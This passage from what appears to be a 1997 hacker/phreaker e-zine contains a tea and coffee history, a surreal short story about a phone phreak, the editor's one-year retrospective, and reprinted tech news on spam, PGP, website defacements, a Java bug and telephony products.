still pouring out of China.


The insecurity of Britain's hold on the tea trade was not
helped by a domestic tax on tea, which in the early 19th century,
was 15 times higher than the tax on imported coffee. This
resulted in coffee use in Britain which increased tenfold
in the forty years between 1800 and 1840, during which time
coffee overtook tea as the drink of choice. After this period
however, several scandals involving coffee led the people
back to tea. After the discovery that several of the larger
coffee importers added such additives as roasted corn,
vegetable roots, and even baked horse liver (!) had been
used to increase the bulk of ground coffee, many buyers
and drinkers were disgusted ( wouldn't you have been disgusted at
that? ) and returned to tea. Also during this scandal,
perhaps to help people use tea again, the taxes were lowered
on imported tea.





Coffee & Its History
Coffee was first mentioned in an Arabic document from the 10th
century. There is evidence however, which states that
in Ethiopia, coffee was cultivated and the berries chewed
as early as the 6th century. During the 10th century,
Arabic people crushed the coffee berries, fermented them,
and made a wine called qahwah. Then, in the 11th
century, they began to use the beans to produce a hot drink
from the berries, which they also called qahwah. As the
use of this beverage spread throughout the world, the word
was adapted to the various languages of the coffee drinking
world, producing such words as cafe, Kaffee, koffie, and coffee.
By the end of the 17th century the Dutch had established
coffee plantations on the Indonesian island of Java. ( hence
the famous nickname of coffee, Java ). During the next 50 years,
first the French and then the British followed suit in their
Caribbean colonies. Commercial cultivation of coffee spread from
the Caribbean to Central and South America, and by the early 19th
century Brazil had supplanted Indonesia as the major producer and
exporter of coffee. By 1860, the US was consuming three quarters of the
world's coffee, more than half of which came from Brazil.


_____________________________________________________________

--------------
--=[Untitled]=--
Provided with permission by the author
--------------

"Why does the ringing not stop? Somebody stop that ringing!" My mind was
screaming those thoughts, yelling with every ounce of its membrane. "Please
make it stop... Wait, why is everything so black? Is this normal?"

I suddenly stopped thinking. The ringing had stopped. Feeling nothing,
thinking nothing; existing was all I could do. Blackness was everywhere. The
blackness did not surround me, I was not a part of it, but I was not separate
from it either. Perhaps I was the blackness. No thoughts entered my mind. It
was not that I couldn't think, not that I was impaired somehow, rather that I
simply did not think. It was not in my power to think. Thinking is just
something I do not do; how could I?

The insistent ringing started again.

"No! No more ringing!" Thoughts streamed through my brain again. I felt cold,
and lonely. Cold like you do when the wind blows right through your sweater
and makes your skin tingle. I was not lonely for lack of company; the
loneliness was something more. I was lonely for a part of me. "Which part?" I
asked myself. "Is there something missing?" Suddenly fear ran through me like
a cold drop of water when it falls under your collar.

"Something *is* wrong! I can feel it..." quickly my fear turned to anger.
"STOP RINGING! STOP THAT RINGING!" I couldn't take that ringing anymore. I
tried to turn my head and open my eyes.

"Ugh!" I couldn't open my eyes, but I saw! What I saw was incredible. I was
in space, in deep space. Huge galaxies in front and behind me, rotating
slowly, spinning round in total silence. To my side, two galaxies inverted in
each other, amazing. Total silence. My thoughts stopped. The galaxies spin
silently in the depths of the universe.

Colors streaked inside each galaxy in view, reds being left behind in the
wake of stars, blue diamonds seemed to sparkle in the middle of each red. All
the red began to slowly fade into an emerald purple with dark green spots
every so often.

Every light I could see began to pulse. The pulsing, slow at first, a deep
rhythmic pulsing, almost as if the universe itself was breathing. Quicker the
pulsing became, now like a heart beat, now like the flashing lights on a
police cruiser. Faster still the pulsing was. Like the frames of a movie.
Like the propeller of a plane.

Darkness. Nothing. My mind sprang back to life yet again. "I'm dead. I am
dead. This is what death is." But I was not sure of my thoughts, I had never
been dead before you see. "Are my eyes closed?" I attempted to send the
command from my brain, through my forehead, to my eyes. Open. Nothing. I
couldn't be sure I even had eyes. Nothing had changed, nothing had moved.
From somewhere deep back in my mind a ringing became clearer, more
persistent. "Maybe this is hell. Perhaps this is what a bad fone phreak gets
as punishment, eternal ringing." The ringing increased in volume somewhat. I
tried to recall how I came to this. "Why am I here? What happened.. I know! I
was holding those 3 lines when ringing current was applied to them. That's
it. That's why I am hearing this horrible ringing now. It must have gotten
stuck in me... Wait, what am I saying? What does that have to do with this
ringing I'm hearing.." I was having trouble thinking clearly, and the ringing
wasn't helping any.

I felt sick to my stomach, but seeing, apparently, that I didn't have a
stomach, I wasn't sure what I was sick to. But I did feel sick, the kind of
sick you get in the car when you're not watching the road. I couldn't move,
couldn't see, couldn't feel a body, couldn't stand that eternal ringing!

Light! Cool air rushed over my body and through my hair as this light blinded
me. Heaven? The car passed me quickly with the sound of its motor changing
pitches as it receded into the distance taking the light with it. I could see
again. I was on the side of a small two-lane road, in what appeared to be the
middle of the desert. An open bridging box was next to me, its 2 record
tables lying on the ground, half covered with dirt. A lineman's handset, laid
in the dirt, both of its clips attached to binding posts in the box.

"The ringing, it's coming from the handset." And sure enough it was. The
handset shook every time it rang. It did not strike me as odd; it was the way
it should be.

I stared at the handset. It rang. And rang. 10, 20, 30 times it rang. I stood
in the dark, the slight breeze sending a chill through me, watching the
handset. Everything went black. The ringing continued. The handset was still
there, its alligator clips floating in the black. Total silence pierced at
intervals by the horrible ringing. The handset shook every time it rang. It
did not strike me as odd, why should it? It was as it should be.

I reached out for the handset, not with my hand, not with my mind, I simply
reached. The ringing stopped with the line going off hook.

I waited. I listened. Nobody spoke.

"Hello?" I asked.

No response. I questioned again into the handset.

"Hello? Who is there?"

A long pause, then, the most soft, and quiet, female voice I had ever heard
came on the line.

"Mr. Quince? I have a collect call for you from a friend. Do you want to
accept?"

"Yes I will accept." I replied without giving it a thought. It was getting
hard to think again, and I didn't want to force myself to.

A few clicks on the line, a short pause, and then he spoke. He spoke softly,
like the operator did, but with a tinge of slowness.

"Hello Keith."

I paused before responding, thinking to myself. "Why can't I focus my
thoughts? What is wrong?" I considered the darkness around me, the dead
silence. I couldn't think. I began to not care.

"Who is this?" I asked with a bit of despair.

"This is your mind Keith."

My thoughts were so groggy; I could barely keep track of what was going on.
The darkness seemed to grow more intense if that was possible. The handset
started to lose its color and depth until it was nothing more than a black
and white picture.

"What do you want?" I managed to get out. The darkness was consuming me. I
couldn't tell where I ended and it began. My thoughts were soon to stop
forever. Before that however, I heard the voice's sweet and gentle
reply.

"I just called to tell you. To tell you that I am leaving. Forever." His
voice echoed softly down to a murmur.

I became blackness, ceasing to exist. All that was left, all that
remained, was the black and white picture of the handset.
_____________________________________________________________


[Looking Back] a year later....
by Scud-O

God, i can not believe that THTJ is 1 year old this month. Hell, I
can not believe how far the zine has come. On June 6th last year (1996), our
first issue came out. It was an in print zine, and at the time, HAVOC Bell
Systems wasn't HAVOC Bell Systems, it was HAVOC. I created HAVOC to be a
local group, my friends, etc. Well, my friends weren't really hackers or
phreakers, they were just a buncha 'anarchists' interested in blowing stuff
up, and other such things. Needless to say, THTJ no longer prints anarchist
files, nor is it in print. About the same time as THTJ 1 came out, the web
site at our old geocities came online. Hell, at the time i knew next to
nothing on HTML, look at the site today, much better. I first made the site
to be just for the HAVOC group, on local stuff, but that changed. I realized
what a place the WWW was. It was a great distribution site for THTJ. Issues 2
and 3 came out during the summer, with mostly a buncha shit i wrote that i am
shocked i could have ever written. By October, i had come back to IRC and both
#phreak and #hacker, channels i had hung out in, and been mostly an idler. I'd
talk, but not that much. Anyway, i met some very cool people like the MIA
|\|\cFill , and current member Keystroke. Afterward, i met REality, and got
him to sign up, then hell everyone was pouring into HBS. We released issues 4
and 5 which mostly had stuff by me, however 5 did include stuff by Key and
McFill. Issue 6 came out around the new year, and then well i released the
bomb. Issue 7 came out, and well, sucked. After 6-9 months of working on THTJ
i had released a bad issue, and well, was worried about THTJ. I was determined
to make issue 8 the best yet. And well, i think i succeeded. It was a smashing
release, and was well received. However during this time, i had let my grades
slip, and i had to let KungFuFox edit THTJ 9. I REALLY want to thank you for
editing THTJ 9 for me Kung, I owe you so much, without you, hell THTJ would
still have a readership of like 100 instead of the thousands that are reading
it currently. Then, well issue 10 came out and was a huge success like issues
8 and 9 before it, and well here is issue 11, which probably is going to have
a big release like the issues before it. I want to thank you all for reading
this article of an insane editor, and to thank you for reading THTJ and
keeping it alive. And I hope THTJ is doing just as well one year from now as
it is currently doing.
_____________________________________________________________
[The News] Edited by KungFuFox


--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------

1 : AOL Mail Chokes on Spam Antidote
2 : Pretty Good Politics
3 : Hong Kong Is Asia's Spam Epicenter
4 : Polish Govt Web Site Hacked - Police Investigate
5 : Gates Harasser Charged
6 : Java Bug Discovered
7 : Anti-Microsoft Sites Rampant On Web
8 : World Wide Web to arrive on pay phones
9 : Phone company says: Put your life on hold until we fix your line
10: Japanese Police Nab Computer User On Hacking Charges
11: Opening Communication Between PCs and Phones
12: Phone giants talk of $50 billion deal
13: HFStival on May 31st

<delphian> cool..
<delphian> war games is on next
<Snefru> where?
<delphian> on my tv
<delphian> its cool.. its like radio.. but with pictures and stuff
-=-
"Ebonics are kinda like women. I don't understand
either of them, but they're both kinda neat."
-eclipse
-=-
<Jimmy191> could someone tell me
what root is? People keep talking about
it.. like a tree root? i know what a tree
root is..
_____________________________________________________________

AOL Mail Chokes on Spam Antidote
by Michael Stutz

12:02pm 13.May.97.PDT -- A rash of email delivery problems this past week at
America Online - including the clogging of several Internet mailing lists -
have been caused mainly by the company's spam-fighting efforts, officials at
the Dulles, Virginia-based company, claim.

Last Friday, AOL chief Steve Case had affirmed a beefing up of the company's
email capabilities in his latest "Community Update" column, saying that
recent efforts to improve system quality included AOL's increased ability to
handle email, and that the number of incoming messages the service could
handle was up to almost 400 million per month.

But while Case's words rang in the background, a portion of the email
messages directed at AOLers from the rest of the Net took up to five days to
arrive - or simply bounced back to the sender.

Alex Phillips, an administrator at Rockingham Internet Community Access, said
the problem caused his company to have almost 8,000 messages to AOL addresses
pile up on his email server.

"It seemed to be localized to select domains on the Net," he said. "Many
messages from other ISPs in the country were flowing just fine. Our mail
server is in Boise, Idaho, and trace routes to AOL's mail server were showing
no response from their St. Louis hop for about a week."

The problem was especially harsh on mailing lists, where copies of each post
would get forwarded to each AOL subscriber on that list, and either bounce
back to the moderator or pile up in the list's email queue.

The Searoom-l, a list for the discussion of wooden sailing ships, was one of
the many lists that felt the curse of AOL email last week. In a message
posted to the list, list moderator John Berg had said, "AOL changed their
software which rejects incoming messages. We can see Searoom-l subscribers'
messages, but they can't see ours, because AOL's new software doesn't accept
our messages."

AOL spokeswoman Tricia Primrose said the problem was an internal gaffe,
caused by an effort to stop spam by selectively blocking incoming email
messages. "I talked to one of our operations guys and he verified that we did
have a problem last week," she said. "We're aggressive in protecting our
members from spam, and we put in a change last week to block it out - and it
unintentionally blocked some incoming listserv mail as well."

The default mail setting for AOLers is PreferredMail, which filters incoming
email from a list of rogue domains and spammers. The list of sites is
available to AOL members by an internal AOL document called "PreferredMail -
The Guard Against Junk E-mail," Primrose said.

A court order last year had limited the notorious spam factory Cyber
Promotions to sending to AOL from only five domains, which AOL has put on its
PreferredMail filter list. The list is updated when users forward copies of
spam to the AOL screen name TOSSPAM.

Primrose noted that the PreferredMail option could be disabled, should the
user want to receive unsolicited commercial email, but that "the vast
majority of our members don't like spam."

Email delivery problems have plagued AOL for some time - a lag between the
steady influx of AOL customers and the company's equipment upgrades have put
a strain both on its system and the rest of the Net. One month ago, a huge
backlog of AOL mail was returned to sender to the University of Madison's
email server, causing it to crash.

"We're constantly scaling our architecture to increase the demand," says
Primrose, noting that internal mail down times do occur, usually lasting from
15 minutes to 2 hours in length. She said AOL has seen email "increase
dramatically in the last five months, coinciding with our switch to flat-rate
pricing, and going from 5 million to 12 million messages a day."

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Pretty Good Politics
by Simson Garfinkel

5:00am 7.May.97.PDT -- Phil Zimmermann is about to fight the biggest battle
of his career. But this time Zimmermann isn't fighting against the US
government; he's fighting against Microsoft and Netscape.

Zimmermann is, of course, that mythic crypto rebel hero. Back in 1991,
Zimmermann wrote an email encryption program called PGP (pretty good privacy)
and gave it away. PGP was "encryption for the masses." That made the US
government nervous.

But PGP has had a big problem since its invention - the program was (and
still is) extremely difficult to use. As a result, most people who have PGP
rarely use it. Hell, I even wrote a book about how to use PGP, and I hate
getting encrypted email; it's a pain. Still, the encryption program has been
the de facto standard for six years.

Zimmermann and his start-up, PGP Inc., are trying to develop an easier-to-use
version of the program, and a plug-in for Netscape Navigator to make
encryption transparent. Unfortunately, they may be blowing into the wind.
That's because both Netscape Communicator, bundled with Navigator 4.0, and
Microsoft Outlook Express, bundled with Explorer 4.0, come with built-in
support for email encryption, and they don't use PGP. Instead, they use a
different technology, called S/MIME. S/MIME is an encryption standard
developed by RSA Data Security.

What's developing here is one of those religious wars for which the computer
industry is so well known. On one side, there is the alliance between
Netscape, Microsoft, RSA Data Security, and much of the computer industry.
They are pushing for S/MIME as a worldwide secure email standard. On the
other side is PGP Inc., which says the S/MIME standard is fundamentally
flawed because it requires support for 40-bit crypto, which is too weak to be
of much utility, but exportable under federal law.

Charles Breed, PGP's director of technical marketing, says S/MIME turns its
back on the thousands of Internet users who use PGP.

Netscape brushes off Breed's charges. "We don't want to get into religious
wars on the mail standards," says Eric Greenberg, Netscape's security product
manager. "There are a lot of PGP users out there, and we are pleased that PGP
has offered a plug-in for our product."

For S/MIME, the real problem doesn't seem to be PGP but the Internet
Engineering Task Force. RSA has offered S/MIME to the IETF as a proposed
standard for sending encrypted email. But at the last IETF meeting in
Memphis, Tennessee, a number of objections were raised:

1. S/MIME is a trademark of RSA Data Security. In order for it to be a
standard, RSA would have to give up the trademark.

2. The S/MIME standard currently requires that any implementation be able to
encrypt and decrypt data using the RC2 data-encryption algorithm and the RSA
public key algorithm. Although RC2 has been published on the Internet, the
algorithm is still officially an RSA Data Security proprietary technology,
and the company has threatened to take legal action against any firm that
implements the algorithm without a license. As for the RSA algorithm, its
patent isn't up until the year 2000.

3. Finally, S/MIME's requirement that any implementation be able to encrypt
and decrypt messages with a 40-bit key doesn't sit well with IETF's technical
gurus, who don't want to approve a standard that requires weak crypto just so
US companies can sell their wares overseas. IETF's charter is to create the
best standard possible, not to create a standard that is in the interests of
US businesses.

"S/MIME in its current incarnation cannot become an Internet standard," says
Jeff Schiller, who heads the IETF's section on security. "So basically, one
of three things has to happen. One is that the RSA people give the IETF
people the appropriate rights to the trademark. Either they have to give up
on RC2 and allow other public key algorithms - it should be possible to
implement this Internet standard without having to buy technology from RSA.
Or the IETF needs to develop something [for which] all the rights are
available."

RSA has until 1 July to make up its mind, Schiller says.

The standard may already be moot. With Microsoft and Netscape poised to ship
millions of programs that implement S/MIME, there certainly will be encrypted
email for anybody who wants it. On the other hand, it would be nice if there
were an international email encryption standard that wasn't hobbled by 40-bit
restrictions.

The real losers in all this are Phil Zimmermann and PGP Inc. That's because
the same rules that prevent Netscape or Microsoft from selling strong crypto
overseas also block PGP from doing the same. PGP's only market is the United
States, and it is competing against Microsoft's free Outlook Express - which
is a pretty darn good email program - and Netscape's Communicator, which does
a much better job of integration than PGP can with its plug-in.

©Packet
_____________________________________________________________

Hong Kong Is Asia's Spam Epicenter
By Eric Lai, IT Daily.

HONG KONG, 1997 MAY 14 (NB) -- The Spam capital of Asia? Without a doubt,
Hong Kong. Two big reasons: Hong Kong's pro-business culture and the
proliferation of ISPs.

The Office of Telecommunications Authority says that under the existing
licence for ISPs, the "transmission of unsolicited advertising information or
unsolicited promotional information" is forbidden because it is a public
nuisance.

The problem is enforcement. OFTA says that regulating junk e-mail is up to
individual service providers. Hong Kong ISPs informally agree to help each
other find and terminate spammer accounts, according to Daniel Ng, president
of the Hong Kong Internet Service Provider Association, a local trade group,
and Hongkong Star Internet.

But as evidenced by complaints from Internet users around the world, local
ISPs have been a little lax in cracking down on spammers. Part of the problem
is the sheer number of ISPs here. The territory has around 60 ISPs, serving,
according to IDC, around 114,000 subscribers. The resulting heavy competition
means that earnest spammers can cheaply and easily hold multiple accounts.

Singapore, by contrast, has about the same number of Internet users, but due
to an arduous licensing process, only three commercial service providers.
Singapore regulations restrict access to political and sexual material on the
Internet, but they don't ban junk e-mail. The Singapore Broadcast Authority
and the Telecommunications Authority of Singapore don't regulate junk e-mail,
or junk faxes, either. The SBA says they only deal with broadcasting and
broadcasting material, while the TAS says it doesn't deal with content.

In the absence of formal rules, Singaporean ISPs have decided to follow
accepted netiquette and stop spam when they find it. "Basically spammers are
a nuisance," says Maureen Tseng, communication manager for Pacific Internet.
While bulk e-mailers have never inadvertently crashed Pacific Internet's mail
servers, they have slowed down performance in "isolated instances." Tseng, as
well as officials from CyberWay, another ISP, agreed that commercial spamming
has not been a major problem.

In the Philippines, there are also more than 60 service providers and no
formal regulations against junk e-mail. But commercial junk E-mails are also
relatively unknown, according to industry executives there. "We're just not
that technologically advanced," quipped a manager at InfoCom, the
Philippines' largest ISP.

Could it be Hong Kong's fabled moneymaking culture which, at the very least,
does not actively frown upon efforts to make a buck? Chapman Chow of Active
Promotion thinks so. Out of more than 3,000 e-mails from Internet users
requesting to be taken off Active Promotion's list, Chow claims he "didn't
get any upset replies." This, he says, indicates that Hong Kong citizens are
more accepting of junk e-mail. Alamo Music's Alleva says about 10 percent of
the replies to his bulk e-mails, sent to Hong Kong and global Internet users,
are negative. But Alleva's statistics aren't necessarily accurate because,
for one thing, his software automatically "bounces back" any messages from
irate users who use foul language.

Creating commercial Web sites is cheap, but it's not an effective marketing
tool unless you get visitors. Bulk e-mail is attractive because it can reach
huge numbers at practically no cost.

Spammers rave about how cheap it all is. But like selfish children, they
conveniently ignore the hard fact that someone is picking up the bill for
them. In most cases, it is the ISPs who have to purchase more computers to
process the extra e-mail traffic. Netvigator, for instance, cited an
overloaded and subsequently crashed e-mail computer to Alleva as its official
reason for terminating his "ccr" account. More staff is also required to
field complaints from subscribers and Internet users worldwide.

Spam recipients aren't spared, as they must spend time downloading, reading
and deleting unwanted e-mail, ask to be removed from junk e-mail lists, or
implement filters to block out spam.

©1997 Newsbytes
_____________________________________________________________

Polish Govt Web Site Hacked - Police Investigate
By Sylvia Dennis

WARSAW, POLAND, 1997 MAY 9 (NB) -- Polish government officials were outraged
this week when it was revealed that the Cabinet office's newly established
Web site had been altered by Polish hackers calling themselves Damage Inc.

The Cabinet Web site has now been taken offline, but a copy of the altered
Web site can be found at http://www.software.com.pl/intdev/news/welcomep.html,
the site of the Net security Institute in Warsaw.

The hackers altered much of the data on the site by uploading their own pages
last weekend, with headers such as "Hackpolska Polska" (Hackrepublic of
Poland) and the "Centrum DizinInformacyjne Polska" (Polish Government
Disinformation Center).

Links from the Cabinet office site were rerouted to a number of sexually
explicit sites. For example, the routes from the site to information about
the Prime Minister route to http://www.playboy.com.

Interestingly, many of the routes from the Web site appear to have been
trashed, and supporting images on the Web site (GIFs) no longer load as
requested. This suggests that the hackers used a "quick and dirty" method of
trashing the site, rather than taking their time.

Gazeta Wyborcza, the Polish daily newspaper, reports that the police, at the
express request of the government, have set up a task force to track down the
hackers, who are thought to reside in Poland.

What the hackers may not be aware of, Newsbytes notes, is that Polska Telecom
is still a state operation, and that listings of telephone accesses to the
Internet are freely available to the Polish secret service. It seems logical
to assume that the police are now hot on the trail of the hackers.

At a press briefing in Warsaw to discuss the hack, the most serious in Polish
history, government spokesperson Aleksandra Jakubowska said that the
government Web server has been disconnected from the Internet until new
security systems are installed.

Considerable anti-hacking fury has been generated by the hack, and Newsbytes'
sources suggest that this may be the catalyst for the Polish government to
formulate its own computer misuse legislation. As Poland is now on the way to
joining the European Community, this unexpected step, by "Damage Inc" could
bring the creation of the legislation forward by several years.

©1997 Newsbytes
_____________________________________________________________

Gates Harasser Charged
(05/16/97; 11:00 a.m. EDT)
By Christine Casatelli, TechWire

SEATTLE -- A 21-year-old Illinois man was arrested after threatening to kill
Microsoft chairman Bill Gates and his wife unless they paid him $5 million,
according to an Associated Press report Thursday.

Adam Quinn Pletcher is charged with making the threats in four letters sent
to Gates at Microsoft's Redmond, Wash., headquarters, the AP report said. A
federal grand jury here indicted Pletcher on Wednesday.

"Obviously, we have taken this threat very seriously," said Mark Murray, a
Microsoft spokesman. The matter was handled in a "rather routine matter" by
Microsoft security, local police and the FBI, he said.

"Bill was never involved in any way in the investigation," said Murray,
adding that he would not comment on whether Gates would be asked to testify.

The first letter, which was received March 14 and intercepted by Microsoft
security, demanded that Gates post a personal ad on America Online to
communicate with the writer.

The last letter, received April 17, told Gates he must put money in a foreign
bank no later than April 26 "to avoid dying, among other things," the AP
report said. Also included in the letter was a computer disk to be used by
Gates to communicate with the writer, who is said to live in Long Grove, Ill.

"The writer cautioned Gates not to notify law enforcement, and that if Gates
did so, the writer could kill him with 'one bullet from my rifle at a quarter
of a mile away,'" the court documents said.

Pletcher also has been the target of a civil lawsuit filed by Illinois
authorities charging that he operated a fraud scheme over the Internet, the
AP report said.

Neither Gates nor his wife were harmed, and the $5 million demand was not
paid, the AP report said.

Pletcher was released after posting $100,000 bail. If convicted of extortion,
he faces a maximum punishment of 20 years in jail and a $250,000 fine.

The arraignment is scheduled for May 22.

©CMP Media, 1996.
_____________________________________________________________

Java Bug Discovered
(05/18/97; 2:45 p.m. EDT)
By Deborah Gage, Computer Reseller News

JavaSoft has posted a statement on its web page acknowledging a Java
verifier bug found by researchers at the University of Washington.

A JavaSoft spokeswoman said the bug enables a class file to filter through
the Java verifier and possibly crash the Java Virtual Machine. JavaSoft does
not consider the bug a security bug because the University of Washington did
not do a security, or so-called denial-of-service, attack.

JavaSoft will issue a patch for Java licensees this week and a fix will go
out in version 1.1.2 of the Java Developers Kit, due within the next two
weeks.

The University of Washington is also working with Microsoft on bugs found in
the Internet Explorer browser, sources said. A Microsoft spokeswoman said,
however, that no similar announcement was planned and that she was unaware of
any bugs.

©CMP Media, 1996.
_____________________________________________________________

Anti-Microsoft Sites Rampant On Web
(05/20/97; 9:00 a.m. EDT)
By Malcolm Maclachlan, TechWire

REDMOND, Wash. -- In the Internet Age, you know you're a VIP when someone
creates a Website just to make fun of you.

No one is more of a VIP than Microsoft chairman Bill Gates. However, the most
mocked on the Internet seems to have taken the attitude that when you're the
biggest, you can take the punches.

"There is so much humor and parody on the Internet," said Kurt Winkelman,
cocreator of a spoof site known as Microcult. "Some of the bigger companies
take it as a compliment."

Microcult compares the software giant to a cult along the lines of Heaven's
Gate. It purports to offer products such as ActiveCult 97 and values
employees willing "to kill themselves for the sake of technology."

The site is the work of Wilmington, Del.-based Museum Mercantile Ltd., a Web
design and hosting firm run by Winkelman and two colleagues. However, far
from being Microsoft haters, the company uses many of its products and has
even done work for Microsoft.

The site just seemed like a fun thing to do, said Winkelman, adding that he
was inspired by another site -- Microsnot -- which included a press release
on Bill Gates buying England. Similarly, he said, some of the site's biggest
fans are Microsoft employees.

There are spoof sites for other companies, too, Winkelman said, including
Wired and CNet. No one, however, compares with Microsoft, he said. There is
now a Website dedicated exclusively toward cataloging Microsoft spoof sites,
called The MSBC Super List of Anti-Microsoft Websites, which contains more
than 80 such links.

Common themes include comparing Gates to Satan or Bill Clinton. Other links
include the The Boycott Microsoft page and the subtly named Microsoft Sucks
page. There is even The Bill Gates Personal Wealth Clock, which tries to keep
up to date with Gates' immense personal fortune.

Despite all the venom, Microsoft does not seem particularly concerned, even
with sites that copy its logos for hostile satire.

"Microsoft does not have any specific stance on spoof sites," a Microsoft
spokesman said. The software giant has not taken action against the
developers on any of the parody Websites, he said. "There are so many out
there, we just let them be."

©CMP Media, 1996.
_____________________________________________________________

World Wide Web to arrive on pay phones
May 20, 1997

TORONTO (Reuter) -- The World Wide Web might be coming to a pay phone near
you, thanks to a small Canadian multimedia company that teamed up Tuesday
with a Hong Kong telecommunications concern.

King Products Inc. said it received a $2.2 million order to supply multimedia
and Internet-ready pay phones to INFA Telecom Asia Ltd. of Hong Kong.

Called PowerPhones, the units will be installed in the Hong Kong Convention
and Exhibition Center in time for the July 1 handover ceremony marking the
transfer of the former British colony to China.

PowerPhones will also be installed in railway stations and other tourist
spots in Hong Kong and throughout China.

"The PowerPhone is a major advance from the pay phones of the past that we
have all become familiar with," King President Peter Richards said at a news
conference.

The wall-mounted unit is a combination pay phone and network computer that
allows the display of advertising, telephone directories, hotel and
restaurant reservations and other information.

Company officials explained that the phone can be used to find a restaurant,
make a reservation or call up a map for directions.

The phones will also allow users to send and receive e-mail and surf the
Internet, though these features will not be available immediately.

The phone comes with a handset, a color touch screen and a slot for so-called
smart cards and credit cards. It is powered by an Intel Corp. Pentium
processor and uses various Internet protocols and accessories to run videos.

"We expect to deploy the PowerPhone throughout Hong Kong and subsequently
into China over the course of the year," INFA Telecom Chairman Peter Tsang
said in a statement.

King, best known for its line of electronic kiosks in malls and other public
places, will make the units in Canada for INFA Telecom, which has operations
in 70 Chinese cities. iMagic Infomedia Technology Ltd. of Hong Kong is
providing software development for the product.

King officials said the PowerPhone will be distributed in North America but
could not give a date.

©1997 Reuters Limited.
_____________________________________________________________

Phone company says: Put your life on hold until we fix your line
Thursday, May 22, 1997
SILICON VALLEY DISPATCHES: MIKE CASSIDY

THIS TALK of high-speed communication, ISDN, T1, cellular, fax and the rest
makes Thomas Wyskida and Renata Kusiak laugh.

They have to laugh; otherwise they'd kill somebody.

It's been three months since they moved from tiny Wappingers Falls, N.Y., to
the self-proclaimed Heart of Silicon Valley, but the technology revolution
has eluded them entirely.

"I can't even call up to order a pizza," Wyskida, 28, says.

It's the phone, or the lack of one. They are discovering what thousands in
Silicon Valley know: Getting quick phone service around here is akin to
hitting the lottery. With job growth and the Internet boom, Pacific Bell had
a back-up of 2,000 service orders in its service area last week. People are
considering bequeathing their place in line to their children or
grandchildren.

Besides saying this will improve, the phone company says this is a good
thing. It means their services are really popular. They had no idea so many
would want so much -- second lines, high-speed computer connections -- so
fast.

"I think that we're in a fairly unique position in this part of the country,"
says Ho Blair, media relations manager. "There is an increased awareness and
sensitivity and state-of-the-art knowledge of telecommunications."

As one who manages media relations, Blair would rather you not call service
delays a problem.

"It's not a problem," he says. "It's quite frankly a situation of heavy
demand."

Which makes Wyskida laugh some more. The phone at the Sunnyvale home he
shares with Kusiak, 31, went dead April 6. Workers fixed the corroded cables
outside his house May 2. In between, he called Pac Bell every day asking for
help.

"I probably talked to every one of their operators in 30 days," he says. "I'm
probably on some kind of death list."

OK. It's not like his phone didn't work at all.

"At 3 o'clock in the morning, the phone would ring. You'd pick it up and
you'd hear loud noises and static."

And it's not like Pac Bell was unsympathetic. One operator suggested he
forward his calls to a neighbor. Wyskida was beginning to think California
was a very different place.

"I figured, it's the same country. How much different can it be?"

But there he was, using a liquor store pay phone to work on his job search
and call friends in New York. And, of course, to call Pac Bell, which did fix
the problem. The phone company even called to check in.

"It was somebody from the billing department," Wyskida says. "They wanted to
know if I received a bill yet."

©San Jose Mercury News 1997
_____________________________________________________________

Japanese Police Nab Computer User On Hacking Charges

TOKYO, JAPAN, 1997 MAY 26 (NB) -- By Martyn Williams. Japanese police said
Friday, they had arrested a Saitama prefecture resident on charges covered
by a recent computer hacking law, the first such time the law has been used.
The man replaced weather images on the home page of TV-Asahi, a national TV
network, with pornographic images.

Koichi Kuboshima, a 27-year old resident of Fujimi, Saitama Prefecture, just
north of Tokyo, allegedly exploited a function on the Web page that allows
users to upload weather information.

Police tracked down Kuboshima by gaining access to the records of an Internet
service provider that he reportedly used to carry out the hack. Local press
reports said the account was opened with a false credit card number and name.

Weather images were replaced with the images at 10am last Sunday morning and
the Web site was taken down at 10:10am when other users notified TV-Asahi.
The site was repaired and available again at 1pm.

If convicted, Kuboshima faces a fine up to one million yen ($8,635) and up to
five years behind bars.

©1997 Newsbytes
_____________________________________________________________

Opening Communication Between PCs and Phones
by Chris Oakes

11:58am 29.May.97.PDT -- Despite the possible uses of linking caller-ID
information to software on the PC, the long-available enabling products
haven't become household - or even SOHO - names. So far, offerings
exploiting caller-ID intelligence have been aimed at larger, multi-line
businesses.

Next month, one company hopes to make PC-based caller-ID technology more
commonplace. To manage the caller-ID information of a single voice line,
SOHOtools' Connect-ID, to be announced at the Atlanta Comdex show, will work
in concert with database and contact-management software to let a PC react to
incoming calls.

The company says its retail price, US$60, introduces a new market to "voice
communication management."

"A number of people have goofed around with caller ID," says SOHOtools
marketing director Don Wallis, "but it has never really been put into a
retail scenario."

The software-plus-hardware product touts call-tracking benefits via software
designed to work in concert with Windows personal information managers such
as Act and SideKick.

As they become compatible with telephony APIs like Microsoft's TAPI, these
and other applications can interact with telco-provided features like caller
ID. Combined with inter-application standards like Windows' Dynamic Data
Exchange, the potential actions initiated by a phone call multiply.

The most obvious use of caller ID for the SOHO market is to leverage caller
ID in a fashion similar to a big call center. When the call comes in, in
addition to being logged and tracked by a database, a wealth of caller
information is instantly accessed. SOHO users can be as responsive to
customers' needs and interests as a large corporate call center.

While increasingly sophisticated in email and fax communications, the PC has
lagged in the management of the voice phone call.

"The modem market had telephony all tied up," said Heather Poggimannis, VAR
program manager for Rochelle Communications, which has been selling caller-ID
PC products to businesses for several years. She says with the dominance of
the modem between the PC and a phone line, it's been hard for the more truly
telephony-oriented caller-ID device to make headway.

Modem-makers like US Robotics are now making caller-ID functionality standard
in their products, but without taking the technology beyond a software-based
version of simple caller-ID devices.

Nor does it often make sense to try to employ caller ID through a modem, she
says, since that line is usually tied up with data duties.

The combination technology also uniquely depends on the maneuvering of two
industries - the telco and PC industries, neither intimately familiar with
the other's market.

Within the PC retail market, Poggimannis says caller-ID products suffer
something of an identity crisis. Their vague "telephony" category - typically
conjuring up modems and online communications - has made them difficult for
stores to categorize and consumers to grasp.

Complicating the issue is the fact that caller ID has only barely become
available nationally, requiring the PC industry to wait while telcos iron out
the technology and upgrade networks for universal deployment.

"There's recently been a major push [for caller ID]," said Poggimannis, "but
only from the telco side of the street." And their side doesn't work with PC
applications in mind. "It's not their market."

Wallis is undaunted. "Our game plan is to come from the bottom up," he said.
If his company can satisfy people with four lines at a new price point of
less than $400, he reasons, it can generate the business to establish a
profitable retail market - ultimately creating a new category of "voice
management" products.

Meanwhile, for consumers, Jeff Johnson of Computer Professionals for Social
Responsibility sees as much misery as benefit from the convergence of the PC
with caller ID.

